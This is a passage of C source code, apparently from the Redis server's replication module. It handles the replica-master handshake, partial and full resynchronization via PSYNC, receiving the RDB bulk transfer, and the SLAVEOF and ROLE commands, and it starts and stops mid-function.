the * usual $<count> bulk format. The other is used for diskless transfers * when the master does not know beforehand the size of the file to * transfer. In the latter case, the following format is used: * * $EOF:<40 bytes delimiter> * * At the end of the file the announced delimiter is transmitted. The * delimiter is long and random enough that the probability of a * collision with the actual file content can be ignored. */ if (strncmp(buf+1,"EOF:",4) == 0 && strlen(buf+5) >= CONFIG_RUN_ID_SIZE) { usemark = 1; memcpy(eofmark,buf+5,CONFIG_RUN_ID_SIZE); memset(lastbytes,0,CONFIG_RUN_ID_SIZE); /* Set any repl_transfer_size to avoid entering this code path * at the next call. */ server.repl_transfer_size = 0; serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: receiving streamed RDB from master"); } else { usemark = 0; server.repl_transfer_size = strtol(buf+1,NULL,10); serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: receiving %lld bytes from master", (long long) server.repl_transfer_size); } return; } /* Read bulk data */ if (usemark) { readlen = sizeof(buf); } else { left = server.repl_transfer_size - server.repl_transfer_read; readlen = (left < (signed)sizeof(buf)) ? left : (signed)sizeof(buf); } nread = read(fd,buf,readlen); if (nread <= 0) { serverLog(LL_WARNING,"I/O error trying to sync with MASTER: %s", (nread == -1) ? strerror(errno) : "connection lost"); cancelReplicationHandshake(); return; } server.stat_net_input_bytes += nread; /* When a mark is used, we want to detect EOF asap in order to avoid * writing the EOF mark into the file... */ int eof_reached = 0; if (usemark) { /* Update the last bytes array, and check if it matches our delimiter.*/ if (nread >= CONFIG_RUN_ID_SIZE) { memcpy(lastbytes,buf+nread-CONFIG_RUN_ID_SIZE,CONFIG_RUN_ID_SIZE); } else { int rem = CONFIG_RUN_ID_SIZE-nread; memmove(lastbytes,lastbytes+nread,rem); memcpy(lastbytes+rem,buf,nread); } if (memcmp(lastbytes,eofmark,CONFIG_RUN_ID_SIZE) == 0) eof_reached = 1; } server.repl_transfer_lastio = server.unixtime; if (write(server.repl_transfer_fd,buf,nread) != nread) { serverLog(LL_WARNING,"Write error or short write writing to the DB dump file needed for MASTER <-> SLAVE synchronization: %s", strerror(errno)); goto error; } server.repl_transfer_read += nread; /* Delete the last 40 bytes from the file if we reached EOF. */ if (usemark && eof_reached) { if (ftruncate(server.repl_transfer_fd, server.repl_transfer_read - CONFIG_RUN_ID_SIZE) == -1) { serverLog(LL_WARNING,"Error truncating the RDB file received from the master for SYNC: %s", strerror(errno)); goto error; } } /* Sync data on disk from time to time, otherwise at the end of the transfer * we may suffer a big delay as the memory buffers are copied into the * actual disk. */ if (server.repl_transfer_read >= server.repl_transfer_last_fsync_off + REPL_MAX_WRITTEN_BEFORE_FSYNC) { off_t sync_size = server.repl_transfer_read - server.repl_transfer_last_fsync_off; rdb_fsync_range(server.repl_transfer_fd, server.repl_transfer_last_fsync_off, sync_size); server.repl_transfer_last_fsync_off += sync_size; } /* Check if the transfer is now complete */ if (!usemark) { if (server.repl_transfer_read == server.repl_transfer_size) eof_reached = 1; } if (eof_reached) { int aof_is_enabled = server.aof_state != AOF_OFF; if (rename(server.repl_transfer_tmpfile,server.rdb_filename) == -1) { serverLog(LL_WARNING,"Failed trying to rename the temp DB into dump.rdb in MASTER <-> SLAVE synchronization: %s", strerror(errno)); cancelReplicationHandshake(); return; } serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Flushing old data"); /* We need to stop any AOFRW fork before flusing and parsing * RDB, otherwise we'll create a copy-on-write disaster. */ if(aof_is_enabled) stopAppendOnly(); signalFlushedDb(-1); emptyDb( -1, server.repl_slave_lazy_flush ? EMPTYDB_ASYNC : EMPTYDB_NO_FLAGS, replicationEmptyDbCallback); /* Before loading the DB into memory we need to delete the readable * handler, otherwise it will get called recursively since * rdbLoad() will call the event loop to process events from time to * time for non blocking loading. */ aeDeleteFileEvent(server.el,server.repl_transfer_s,AE_READABLE); serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Loading DB in memory"); rdbSaveInfo rsi = RDB_SAVE_INFO_INIT; if (rdbLoad(server.rdb_filename,&rsi) != C_OK) { serverLog(LL_WARNING,"Failed trying to load the MASTER synchronization DB from disk"); cancelReplicationHandshake(); /* Re-enable the AOF if we disabled it earlier, in order to restore * the original configuration. */ if (aof_is_enabled) restartAOF(); return; } /* Final setup of the connected slave <- master link */ zfree(server.repl_transfer_tmpfile); close(server.repl_transfer_fd); replicationCreateMasterClient(server.repl_transfer_s,rsi.repl_stream_db); server.repl_state = REPL_STATE_CONNECTED; /* After a full resynchroniziation we use the replication ID and * offset of the master. The secondary ID / offset are cleared since * we are starting a new history. */ memcpy(server.replid,server.master->replid,sizeof(server.replid)); server.master_repl_offset = server.master->reploff; clearReplicationId2(); /* Let's create the replication backlog if needed. Slaves need to * accumulate the backlog regardless of the fact they have sub-slaves * or not, in order to behave correctly if they are promoted to * masters after a failover. */ if (server.repl_backlog == NULL) createReplicationBacklog(); serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Finished with success"); /* Restart the AOF subsystem now that we finished the sync. This * will trigger an AOF rewrite, and when done will start appending * to the new file. */ if (aof_is_enabled) restartAOF(); } return; error: cancelReplicationHandshake(); return; } /* Send a synchronous command to the master. Used to send AUTH and * REPLCONF commands before starting the replication with SYNC. * * The command returns an sds string representing the result of the * operation. On error the first byte is a "-". */ #define SYNC_CMD_READ (1<<0) #define SYNC_CMD_WRITE (1<<1) #define SYNC_CMD_FULL (SYNC_CMD_READ|SYNC_CMD_WRITE) char *sendSynchronousCommand(int flags, int fd, ...) { /* Create the command to send to the master, we use simple inline * protocol for simplicity as currently we only send simple strings. */ if (flags & SYNC_CMD_WRITE) { char *arg; va_list ap; sds cmd = sdsempty(); va_start(ap,fd); while(1) { arg = va_arg(ap, char*); if (arg == NULL) break; if (sdslen(cmd) != 0) cmd = sdscatlen(cmd," ",1); cmd = sdscat(cmd,arg); } cmd = sdscatlen(cmd,"\r\n",2); /* Transfer command to the server. */ if (syncWrite(fd,cmd,sdslen(cmd),server.repl_syncio_timeout*1000) == -1) { sdsfree(cmd); return sdscatprintf(sdsempty(),"-Writing to master: %s", strerror(errno)); } sdsfree(cmd); va_end(ap); } /* Read the reply from the server. */ if (flags & SYNC_CMD_READ) { char buf[256]; if (syncReadLine(fd,buf,sizeof(buf),server.repl_syncio_timeout*1000) == -1) { return sdscatprintf(sdsempty(),"-Reading from master: %s", strerror(errno)); } server.repl_transfer_lastio = server.unixtime; return sdsnew(buf); } return NULL; } /* Try a partial resynchronization with the master if we are about to reconnect. * If there is no cached master structure, at least try to issue a * "PSYNC ? -1" command in order to trigger a full resync using the PSYNC * command in order to obtain the master run id and the master replication * global offset. * * This function is designed to be called from syncWithMaster(), so the * following assumptions are made: * * 1) We pass the function an already connected socket "fd". * 2) This function does not close the file descriptor "fd". However in case * of successful partial resynchronization, the function will reuse * 'fd' as file descriptor of the server.master client structure. * * The function is split in two halves: if read_reply is 0, the function * writes the PSYNC command on the socket, and a new function call is * needed, with read_reply set to 1, in order to read the reply of the * command. This is useful in order to support non blocking operations, so * that we write, return into the event loop, and read when there are data. * * When read_reply is 0 the function returns PSYNC_WRITE_ERR if there * was a write error, or PSYNC_WAIT_REPLY to signal we need another call * with read_reply set to 1. However even when read_reply is set to 1 * the function may return PSYNC_WAIT_REPLY again to signal there were * insufficient data to read to complete its work. We should re-enter * into the event loop and wait in such a case. * * The function returns: * * PSYNC_CONTINUE: If the PSYNC command succeded and we can continue. * PSYNC_FULLRESYNC: If PSYNC is supported but a full resync is needed. * In this case the master run_id and global replication * offset is saved. * PSYNC_NOT_SUPPORTED: If the server does not understand PSYNC at all and * the caller should fall back to SYNC. * PSYNC_WRITE_ERROR: There was an error writing the command to the socket. * PSYNC_WAIT_REPLY: Call again the function with read_reply set to 1. * PSYNC_TRY_LATER: Master is currently in a transient error condition. * * Notable side effects: * * 1) As a side effect of the function call the function removes the readable * event handler from "fd", unless the return value is PSYNC_WAIT_REPLY. * 2) server.master_initial_offset is set to the right value according * to the master reply. This will be used to populate the 'server.master' * structure replication offset. */ #define PSYNC_WRITE_ERROR 0 #define PSYNC_WAIT_REPLY 1 #define PSYNC_CONTINUE 2 #define PSYNC_FULLRESYNC 3 #define PSYNC_NOT_SUPPORTED 4 #define PSYNC_TRY_LATER 5 int slaveTryPartialResynchronization(int fd, int read_reply) { char *psync_replid; char psync_offset[32]; sds reply; /* Writing half */ if (!read_reply) { /* Initially set master_initial_offset to -1 to mark the current * master run_id and offset as not valid. Later if we'll be able to do * a FULL resync using the PSYNC command we'll set the offset at the * right value, so that this information will be propagated to the * client structure representing the master into server.master. */ server.master_initial_offset = -1; if (server.cached_master) { psync_replid = server.cached_master->replid; snprintf(psync_offset,sizeof(psync_offset),"%lld", server.cached_master->reploff+1); serverLog(LL_NOTICE,"Trying a partial resynchronization (request %s:%s).", psync_replid, psync_offset); } else { serverLog(LL_NOTICE,"Partial resynchronization not possible (no cached master)"); psync_replid = "?"; memcpy(psync_offset,"-1",3); } /* Issue the PSYNC command */ reply = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"PSYNC",psync_replid,psync_offset,NULL); if (reply != NULL) { serverLog(LL_WARNING,"Unable to send PSYNC to master: %s",reply); sdsfree(reply); aeDeleteFileEvent(server.el,fd,AE_READABLE); return PSYNC_WRITE_ERROR; } return PSYNC_WAIT_REPLY; } /* Reading half */ reply = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL); if (sdslen(reply) == 0) { /* The master may send empty newlines after it receives PSYNC * and before to reply, just to keep the connection alive. */ sdsfree(reply); return PSYNC_WAIT_REPLY; } aeDeleteFileEvent(server.el,fd,AE_READABLE); if (!strncmp(reply,"+FULLRESYNC",11)) { char *replid = NULL, *offset = NULL; /* FULL RESYNC, parse the reply in order to extract the run id * and the replication offset. */ replid = strchr(reply,' '); if (replid) { replid++; offset = strchr(replid,' '); if (offset) offset++; } if (!replid || !offset || (offset-replid-1) != CONFIG_RUN_ID_SIZE) { serverLog(LL_WARNING, "Master replied with wrong +FULLRESYNC syntax."); /* This is an unexpected condition, actually the +FULLRESYNC * reply means that the master supports PSYNC, but the reply * format seems wrong. To stay safe we blank the master * replid to make sure next PSYNCs will fail. */ memset(server.master_replid,0,CONFIG_RUN_ID_SIZE+1); } else { memcpy(server.master_replid, replid, offset-replid-1); server.master_replid[CONFIG_RUN_ID_SIZE] = '\0'; server.master_initial_offset = strtoll(offset,NULL,10); serverLog(LL_NOTICE,"Full resync from master: %s:%lld", server.master_replid, server.master_initial_offset); } /* We are going to full resync, discard the cached master structure. */ replicationDiscardCachedMaster(); sdsfree(reply); return PSYNC_FULLRESYNC; } if (!strncmp(reply,"+CONTINUE",9)) { /* Partial resync was accepted. */ serverLog(LL_NOTICE, "Successful partial resynchronization with master."); /* Check the new replication ID advertised by the master. If it * changed, we need to set the new ID as primary ID, and set or * secondary ID as the old master ID up to the current offset, so * that our sub-slaves will be able to PSYNC with us after a * disconnection. */ char *start = reply+10; char *end = reply+9; while(end[0] != '\r' && end[0] != '\n' && end[0] != '\0') end++; if (end-start == CONFIG_RUN_ID_SIZE) { char new[CONFIG_RUN_ID_SIZE+1]; memcpy(new,start,CONFIG_RUN_ID_SIZE); new[CONFIG_RUN_ID_SIZE] = '\0'; if (strcmp(new,server.cached_master->replid)) { /* Master ID changed. */ serverLog(LL_WARNING,"Master replication ID changed to %s",new); /* Set the old ID as our ID2, up to the current offset+1. */ memcpy(server.replid2,server.cached_master->replid, sizeof(server.replid2)); server.second_replid_offset = server.master_repl_offset+1; /* Update the cached master ID and our own primary ID to the * new one. */ memcpy(server.replid,new,sizeof(server.replid)); memcpy(server.cached_master->replid,new,sizeof(server.replid)); /* Disconnect all the sub-slaves: they need to be notified. */ disconnectSlaves(); } } /* Setup the replication to continue. */ sdsfree(reply); replicationResurrectCachedMaster(fd); /* If this instance was restarted and we read the metadata to * PSYNC from the persistence file, our replication backlog could * be still not initialized. Create it. */ if (server.repl_backlog == NULL) createReplicationBacklog(); return PSYNC_CONTINUE; } /* If we reach this point we received either an error (since the master does * not understand PSYNC or because it is in a special state and cannot * serve our request), or an unexpected reply from the master. * * Return PSYNC_NOT_SUPPORTED on errors we don't understand, otherwise * return PSYNC_TRY_LATER if we believe this is a transient error. */ if (!strncmp(reply,"-NOMASTERLINK",13) || !strncmp(reply,"-LOADING",8)) { serverLog(LL_NOTICE, "Master is currently unable to PSYNC " "but should be in the future: %s", reply); sdsfree(reply); return PSYNC_TRY_LATER; } if (strncmp(reply,"-ERR",4)) { /* If it's not an error, log the unexpected event. */ serverLog(LL_WARNING, "Unexpected reply to PSYNC from master: %s", reply); } else { serverLog(LL_NOTICE, "Master does not support PSYNC or is in " "error state (reply: %s)", reply); } sdsfree(reply); replicationDiscardCachedMaster(); return PSYNC_NOT_SUPPORTED; } /* This handler fires when the non blocking connect was able to * establish a connection with the master. */ void syncWithMaster(aeEventLoop *el, int fd, void *privdata, int mask) { char tmpfile[256], *err = NULL; int dfd = -1, maxtries = 5; int sockerr = 0, psync_result; socklen_t errlen = sizeof(sockerr); UNUSED(el); UNUSED(privdata); UNUSED(mask); /* If this event fired after the user turned the instance into a master * with SLAVEOF NO ONE we must just return ASAP. */ if (server.repl_state == REPL_STATE_NONE) { close(fd); return; } /* Check for errors in the socket: after a non blocking connect() we * may find that the socket is in error state. */ if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &sockerr, &errlen) == -1) sockerr = errno; if (sockerr) { serverLog(LL_WARNING,"Error condition on socket for SYNC: %s", strerror(sockerr)); goto error; } /* Send a PING to check the master is able to reply without errors. */ if (server.repl_state == REPL_STATE_CONNECTING) { serverLog(LL_NOTICE,"Non blocking connect for SYNC fired the event."); /* Delete the writable event so that the readable event remains * registered and we can wait for the PONG reply. */ aeDeleteFileEvent(server.el,fd,AE_WRITABLE); server.repl_state = REPL_STATE_RECEIVE_PONG; /* Send the PING, don't check for errors at all, we have the timeout * that will take care about this. */ err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"PING",NULL); if (err) goto write_error; return; } /* Receive the PONG command. */ if (server.repl_state == REPL_STATE_RECEIVE_PONG) { err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL); /* We accept only two replies as valid, a positive +PONG reply * (we just check for "+") or an authentication error. * Note that older versions of Redis replied with "operation not * permitted" instead of using a proper error code, so we test * both. */ if (err[0] != '+' && strncmp(err,"-NOAUTH",7) != 0 && strncmp(err,"-ERR operation not permitted",28) != 0) { serverLog(LL_WARNING,"Error reply to PING from master: '%s'",err); sdsfree(err); goto error; } else { serverLog(LL_NOTICE, "Master replied to PING, replication can continue..."); } sdsfree(err); server.repl_state = REPL_STATE_SEND_AUTH; } /* AUTH with the master if required. */ if (server.repl_state == REPL_STATE_SEND_AUTH) { if (server.masterauth) { err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"AUTH",server.masterauth,NULL); if (err) goto write_error; server.repl_state = REPL_STATE_RECEIVE_AUTH; return; } else { server.repl_state = REPL_STATE_SEND_PORT; } } /* Receive AUTH reply. */ if (server.repl_state == REPL_STATE_RECEIVE_AUTH) { err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL); if (err[0] == '-') { serverLog(LL_WARNING,"Unable to AUTH to MASTER: %s",err); sdsfree(err); goto error; } sdsfree(err); server.repl_state = REPL_STATE_SEND_PORT; } /* Set the slave port, so that Master's INFO command can list the * slave listening port correctly. */ if (server.repl_state == REPL_STATE_SEND_PORT) { sds port = sdsfromlonglong(server.slave_announce_port ? server.slave_announce_port : server.port); err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"REPLCONF", "listening-port",port, NULL); sdsfree(port); if (err) goto write_error; sdsfree(err); server.repl_state = REPL_STATE_RECEIVE_PORT; return; } /* Receive REPLCONF listening-port reply. */ if (server.repl_state == REPL_STATE_RECEIVE_PORT) { err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL); /* Ignore the error if any, not all the Redis versions support * REPLCONF listening-port. */ if (err[0] == '-') { serverLog(LL_NOTICE,"(Non critical) Master does not understand " "REPLCONF listening-port: %s", err); } sdsfree(err); server.repl_state = REPL_STATE_SEND_IP; } /* Skip REPLCONF ip-address if there is no slave-announce-ip option set. */ if (server.repl_state == REPL_STATE_SEND_IP && server.slave_announce_ip == NULL) { server.repl_state = REPL_STATE_SEND_CAPA; } /* Set the slave ip, so that Master's INFO command can list the * slave IP address port correctly in case of port forwarding or NAT. */ if (server.repl_state == REPL_STATE_SEND_IP) { err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"REPLCONF", "ip-address",server.slave_announce_ip, NULL); if (err) goto write_error; sdsfree(err); server.repl_state = REPL_STATE_RECEIVE_IP; return; } /* Receive REPLCONF ip-address reply. */ if (server.repl_state == REPL_STATE_RECEIVE_IP) { err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL); /* Ignore the error if any, not all the Redis versions support * REPLCONF listening-port. */ if (err[0] == '-') { serverLog(LL_NOTICE,"(Non critical) Master does not understand " "REPLCONF ip-address: %s", err); } sdsfree(err); server.repl_state = REPL_STATE_SEND_CAPA; } /* Inform the master of our (slave) capabilities. * * EOF: supports EOF-style RDB transfer for diskless replication. * PSYNC2: supports PSYNC v2, so understands +CONTINUE <new repl ID>. * * The master will ignore capabilities it does not understand. */ if (server.repl_state == REPL_STATE_SEND_CAPA) { err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"REPLCONF", "capa","eof","capa","psync2",NULL); if (err) goto write_error; sdsfree(err); server.repl_state = REPL_STATE_RECEIVE_CAPA; return; } /* Receive CAPA reply. */ if (server.repl_state == REPL_STATE_RECEIVE_CAPA) { err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL); /* Ignore the error if any, not all the Redis versions support * REPLCONF capa. */ if (err[0] == '-') { serverLog(LL_NOTICE,"(Non critical) Master does not understand " "REPLCONF capa: %s", err); } sdsfree(err); server.repl_state = REPL_STATE_SEND_PSYNC; } /* Try a partial resynchonization. If we don't have a cached master * slaveTryPartialResynchronization() will at least try to use PSYNC * to start a full resynchronization so that we get the master run id * and the global offset, to try a partial resync at the next * reconnection attempt. */ if (server.repl_state == REPL_STATE_SEND_PSYNC) { if (slaveTryPartialResynchronization(fd,0) == PSYNC_WRITE_ERROR) { err = sdsnew("Write error sending the PSYNC command."); goto write_error; } server.repl_state = REPL_STATE_RECEIVE_PSYNC; return; } /* If reached this point, we should be in REPL_STATE_RECEIVE_PSYNC. */ if (server.repl_state != REPL_STATE_RECEIVE_PSYNC) { serverLog(LL_WARNING,"syncWithMaster(): state machine error, " "state should be RECEIVE_PSYNC but is %d", server.repl_state); goto error; } psync_result = slaveTryPartialResynchronization(fd,1); if (psync_result == PSYNC_WAIT_REPLY) return; /* Try again later... */ /* If the master is in an transient error, we should try to PSYNC * from scratch later, so go to the error path. This happens when * the server is loading the dataset or is not connected with its * master and so forth. */ if (psync_result == PSYNC_TRY_LATER) goto error; /* Note: if PSYNC does not return WAIT_REPLY, it will take care of * uninstalling the read handler from the file descriptor. */ if (psync_result == PSYNC_CONTINUE) { serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Master accepted a Partial Resynchronization."); return; } /* PSYNC failed or is not supported: we want our slaves to resync with us * as well, if we have any sub-slaves. The master may transfer us an * entirely different data set and we have no way to incrementally feed * our slaves after that. */ disconnectSlaves(); /* Force our slaves to resync with us as well. */ freeReplicationBacklog(); /* Don't allow our chained slaves to PSYNC. */ /* Fall back to SYNC if needed. Otherwise psync_result == PSYNC_FULLRESYNC * and the server.master_replid and master_initial_offset are * already populated. */ if (psync_result == PSYNC_NOT_SUPPORTED) { serverLog(LL_NOTICE,"Retrying with SYNC..."); if (syncWrite(fd,"SYNC\r\n",6,server.repl_syncio_timeout*1000) == -1) { serverLog(LL_WARNING,"I/O error writing to MASTER: %s", strerror(errno)); goto error; } } /* Prepare a suitable temp file for bulk transfer */ while(maxtries--) { snprintf(tmpfile,256, "temp-%d.%ld.rdb",(int)server.unixtime,(long int)getpid()); dfd = open(tmpfile,O_CREAT|O_WRONLY|O_EXCL,0644); if (dfd != -1) break; sleep(1); } if (dfd == -1) { serverLog(LL_WARNING,"Opening the temp file needed for MASTER <-> SLAVE synchronization: %s",strerror(errno)); goto error; } /* Setup the non blocking download of the bulk file. */ if (aeCreateFileEvent(server.el,fd, AE_READABLE,readSyncBulkPayload,NULL) == AE_ERR) { serverLog(LL_WARNING, "Can't create readable event for SYNC: %s (fd=%d)", strerror(errno),fd); goto error; } server.repl_state = REPL_STATE_TRANSFER; server.repl_transfer_size = -1; server.repl_transfer_read = 0; server.repl_transfer_last_fsync_off = 0; server.repl_transfer_fd = dfd; server.repl_transfer_lastio = server.unixtime; server.repl_transfer_tmpfile = zstrdup(tmpfile); return; error: aeDeleteFileEvent(server.el,fd,AE_READABLE|AE_WRITABLE); if (dfd != -1) close(dfd); close(fd); server.repl_transfer_s = -1; server.repl_state = REPL_STATE_CONNECT; return; write_error: /* Handle sendSynchronousCommand(SYNC_CMD_WRITE) errors. */ serverLog(LL_WARNING,"Sending command to master in replication handshake: %s", err); sdsfree(err); goto error; } int connectWithMaster(void) { int fd; fd = anetTcpNonBlockBestEffortBindConnect(NULL, server.masterhost,server.masterport,NET_FIRST_BIND_ADDR); if (fd == -1) { serverLog(LL_WARNING,"Unable to connect to MASTER: %s", strerror(errno)); return C_ERR; } if (aeCreateFileEvent(server.el,fd,AE_READABLE|AE_WRITABLE,syncWithMaster,NULL) == AE_ERR) { close(fd); serverLog(LL_WARNING,"Can't create readable event for SYNC"); return C_ERR; } server.repl_transfer_lastio = server.unixtime; server.repl_transfer_s = fd; server.repl_state = REPL_STATE_CONNECTING; return C_OK; } /* This function can be called when a non blocking connection is currently * in progress to undo it. * Never call this function directly, use cancelReplicationHandshake() instead. */ void undoConnectWithMaster(void) { int fd = server.repl_transfer_s; aeDeleteFileEvent(server.el,fd,AE_READABLE|AE_WRITABLE); close(fd); server.repl_transfer_s = -1; } /* Abort the async download of the bulk dataset while SYNC-ing with master. * Never call this function directly, use cancelReplicationHandshake() instead. */ void replicationAbortSyncTransfer(void) { serverAssert(server.repl_state == REPL_STATE_TRANSFER); undoConnectWithMaster(); close(server.repl_transfer_fd); unlink(server.repl_transfer_tmpfile); zfree(server.repl_transfer_tmpfile); } /* This function aborts a non blocking replication attempt if there is one * in progress, by canceling the non-blocking connect attempt or * the initial bulk transfer. * * If there was a replication handshake in progress 1 is returned and * the replication state (server.repl_state) set to REPL_STATE_CONNECT. * * Otherwise zero is returned and no operation is perforemd at all. */ int cancelReplicationHandshake(void) { if (server.repl_state == REPL_STATE_TRANSFER) { replicationAbortSyncTransfer(); server.repl_state = REPL_STATE_CONNECT; } else if (server.repl_state == REPL_STATE_CONNECTING || slaveIsInHandshakeState()) { undoConnectWithMaster(); server.repl_state = REPL_STATE_CONNECT; } else { return 0; } return 1; } /* Set replication to the specified master address and port. */ void replicationSetMaster(char *ip, int port) { int was_master = server.masterhost == NULL; sdsfree(server.masterhost); server.masterhost = sdsnew(ip); server.masterport = port; if (server.master) { freeClient(server.master); } disconnectAllBlockedClients(); /* Clients blocked in master, now slave. */ /* Force our slaves to resync with us as well. They may hopefully be able * to partially resync with us, but we can notify the replid change. */ disconnectSlaves(); cancelReplicationHandshake(); /* Before destroying our master state, create a cached master using * our own parameters, to later PSYNC with the new master. */ if (was_master) replicationCacheMasterUsingMyself(); server.repl_state = REPL_STATE_CONNECT; server.repl_down_since = 0; } /* Cancel replication, setting the instance as a master itself. */ void replicationUnsetMaster(void) { if (server.masterhost == NULL) return; /* Nothing to do. */ sdsfree(server.masterhost); server.masterhost = NULL; /* When a slave is turned into a master, the current replication ID * (that was inherited from the master at synchronization time) is * used as secondary ID up to the current offset, and a new replication * ID is created to continue with a new replication history. */ shiftReplicationId(); if (server.master) freeClient(server.master); replicationDiscardCachedMaster(); cancelReplicationHandshake(); /* Disconnecting all the slaves is required: we need to inform slaves * of the replication ID change (see shiftReplicationId() call). However * the slaves will be able to partially resync with us, so it will be * a very fast reconnection. */ disconnectSlaves(); server.repl_state = REPL_STATE_NONE; /* We need to make sure the new master will start the replication stream * with a SELECT statement. This is forced after a full resync, but * with PSYNC version 2, there is no need for full resync after a * master switch. */ server.slaveseldb = -1; } /* This function is called when the slave lose the connection with the * master into an unexpected way. */ void replicationHandleMasterDisconnection(void) { server.master = NULL; server.repl_state = REPL_STATE_CONNECT; server.repl_down_since = server.unixtime; /* We lost connection with our master, don't disconnect slaves yet, * maybe we'll be able to PSYNC with our master later. We'll disconnect * the slaves only if we'll have to do a full resync with our master. */ } void slaveofCommand(client *c) { /* SLAVEOF is not allowed in cluster mode as replication is automatically * configured using the current address of the master node. */ if (server.cluster_enabled) { addReplyError(c,"SLAVEOF not allowed in cluster mode."); return; } /* The special host/port combination "NO" "ONE" turns the instance * into a master. Otherwise the new master address is set. */ if (!strcasecmp(c->argv[1]->ptr,"no") && !strcasecmp(c->argv[2]->ptr,"one")) { if (server.masterhost) { replicationUnsetMaster(); sds client = catClientInfoString(sdsempty(),c); serverLog(LL_NOTICE,"MASTER MODE enabled (user request from '%s')", client); sdsfree(client); } } else { long port; if ((getLongFromObjectOrReply(c, c->argv[2], &port, NULL) != C_OK)) return; /* Check if we are already attached to the specified slave */ if (server.masterhost && !strcasecmp(server.masterhost,c->argv[1]->ptr) && server.masterport == port) { serverLog(LL_NOTICE,"SLAVE OF would result into synchronization with the master we are already connected with. No operation performed."); addReplySds(c,sdsnew("+OK Already connected to specified master\r\n")); return; } /* There was no previous master or the user specified a different one, * we can continue. */ replicationSetMaster(c->argv[1]->ptr, port); sds client = catClientInfoString(sdsempty(),c); serverLog(LL_NOTICE,"SLAVE OF %s:%d enabled (user request from '%s')", server.masterhost, server.masterport, client); sdsfree(client); } addReply(c,shared.ok); } /* ROLE command: provide information about the role of the instance * (master or slave) and additional information related to replication * in an easy to process format. */ void roleCommand(client *c) { if (server.masterhost == NULL) { listIter li; listNode *ln; void *mbcount; int slaves = 0; addReplyMultiBulkLen(c,3); addReplyBulkCBuffer(c,"master",6); addReplyLongLong(c,server.master_repl_offset); mbcount = addDeferredMultiBulkLength(c); listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; char ip[NET_IP_STR_LEN], *slaveip = slave->slave_ip; if (slaveip[0] == '\0') { if (anetPeerToString(slave->fd,ip,sizeof(ip),NULL) == -1) continue; slaveip = ip; } if (slave->replstate != SLAVE_STATE_ONLINE) continue; addReplyMultiBulkLen(c,3); addReplyBulkCString(c,slaveip); addReplyBulkLongLong(c,slave->slave_listening_port); addReplyBulkLongLong(c,slave->repl_ack_off); slaves++; } setDeferredMultiBulkLength(c,mbcount,slaves); } else { char *slavestate = NULL; addReplyMultiBulkLen(c,5); addReplyBulkCBuffer(c,"slave",5); addReplyBulkCString(c,server.masterhost); addReplyLongLong(c,server.masterport); if (slaveIsInHandshakeState()) { slavestate = "handshake"; } else { switch(server.repl_state) { case REPL_STATE_NONE: slavestate = "none"; break; case REPL_STATE_CONNECT: slavestate = "connect"; break; case REPL_STATE_CONNECTING: slavestate = "connecting"; break; case REPL_STATE_TRANSFER: slavestate = "sync"; break; case REPL_STATE_CONNECTED: slavestate = "connected"; break; default: slavestate = "unknown"; break; } } addReplyBulkCString(c,slavestate); addReplyLongLong(c,server.master ? server.master->reploff : -1); } } /* Send a REPLCONF ACK command to the master to inform it about the current * processed offset. If we are not connected with a master, the command has * no effects. */ void replicationSendAck(void) { client *c = server.master; if (c != NULL) { c->flags |= CLIENT_MASTER_FORCE_REPLY; addReplyMultiBulkLen(c,3); addReplyBulkCString(c,"REPLCONF"); addReplyBulkCString(c,"ACK"); addReplyBulkLongLong(c,c->reploff); c->flags &= ~CLIENT_MASTER_FORCE_REPLY; } } /* ---------------------- MASTER CACHING FOR PSYNC -------------------------- */ /* In order to implement partial synchronization we need to be able to cache * our master's client structure after a transient disconnection. * It is cached into server.cached_master and flushed away using the following * functions. */ /* This function is called by freeClient() in order to cache the master * client structure instead of destryoing it. freeClient() will return * ASAP after this function returns, so every action needed to avoid problems * with a client that is really "suspended" has to be done by this function. * * The other functions that will deal with the cached master are: * * replicationDiscardCachedMaster() that will make sure to kill the client * as for some reason we don't want to use it in the future. * * replicationResurrectCachedMaster() that is used after a successful PSYNC * handshake in order to reactivate the cached master. */ void replicationCacheMaster(client *c) { serverAssert(server.master != NULL && server.cached_master == NULL); serverLog(LL_NOTICE,"Caching the disconnected master state."); /* Unlink the client from the server structures. */ unlinkClient(c); /* Reset the master client so that's ready to accept new commands: * we want to discard te non processed query buffers and non processed * offsets, including pending transactions, already populated arguments, * pending outputs to the master. */ sdsclear(server.master->querybuf); sdsclear(server.master->pending_querybuf); server.master->read_reploff = server.master->reploff; if (c->flags & CLIENT_MULTI) discardTransaction(c); listEmpty(c->reply); c->bufpos = 0; resetClient(c); /* Save the master. Server.master will be set to null later by * replicationHandleMasterDisconnection(). */ server.cached_master = server.master; /* Invalidate the Peer ID cache. */ if (c->peerid) { sdsfree(c->peerid); c->peerid = NULL; } /* Caching the master happens instead of the actual freeClient() call, * so make sure to adjust the replication state. This function will * also set server.master to NULL. */ replicationHandleMasterDisconnection(); } /* This function is called when a master is turend into a slave, in order to * create from scratch a cached master for the new client, that will allow * to PSYNC with the slave that was promoted as the new master after a * failover. * * Assuming this instance was previously the master instance of the new master, * the new master will accept its replication ID, and potentiall also the * current offset if no data was lost during the failover. So we use our * current replication ID and offset in order to synthesize a cached master. */ void replicationCacheMasterUsingMyself(void) { /* The master client we create can be set to any DBID, because * the new master will start its replication stream with SELECT. */ server.master_initial_offset = server.master_repl_offset; replicationCreateMasterClient(-1,-1); /* Use our own ID / offset. */ memcpy(server.master->replid, server.replid, sizeof(server.replid)); /* Set as cached master. */ 